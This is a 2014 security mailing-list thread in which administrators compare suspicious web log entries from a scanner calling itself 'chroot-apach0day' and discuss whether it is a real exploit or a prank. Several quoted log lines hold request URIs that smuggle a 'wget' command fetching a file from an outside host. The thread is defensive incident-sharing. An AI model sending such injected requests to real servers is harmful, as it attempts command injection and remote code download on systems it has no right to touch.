PaulDotCom mailing list archives
Re: [Security Weekly] apache chroot 0day?
From: Oleg Laskin <oleglaskin () gmail com>
Date: Mon, 28 Jul 2014 14:54:10 -0400
Would this be a reverse honeypot? :)

I just got a hit also on my sensor:

162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8687 "-" "chroot-apach0day"

Oleg.

On Mon, Jul 28, 2014 at 2:38 PM, Eric Buckingham <erikb () proxypipe com> wrote:

Looks like an attempt by somebody to troll us sadly :/

On Mon, Jul 28, 2014 at 2:18 PM, Jim Halfpenny <jim.halfpenny () gmail com> wrote:

It didn't take long to get a pcap of this request, I started httpd on a random VPS of mine and it's the only request I have received so far. At first glance it doesn't seem like anything special.

Jim

On 28 July 2014 15:54, Robin Wood <robin@digi.ninja> wrote:

On 28 July 2014 15:30, Frank Michael <frankcmichael () gmail com> wrote:

Various sources confirming the same thing for other sites. All on 7/28. Keep an eye open.

I've just mailed the SANS ISC about it saying that others had seen it, see if they come back with anything.

Robin

On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:

I've got a site that was scanned this morning by a tool that left these entries in the logs:

[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;

Anyone recognise it? That user agent isn't coming up in google searches.

Robin

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Current thread:
- [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Sander Demeester (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)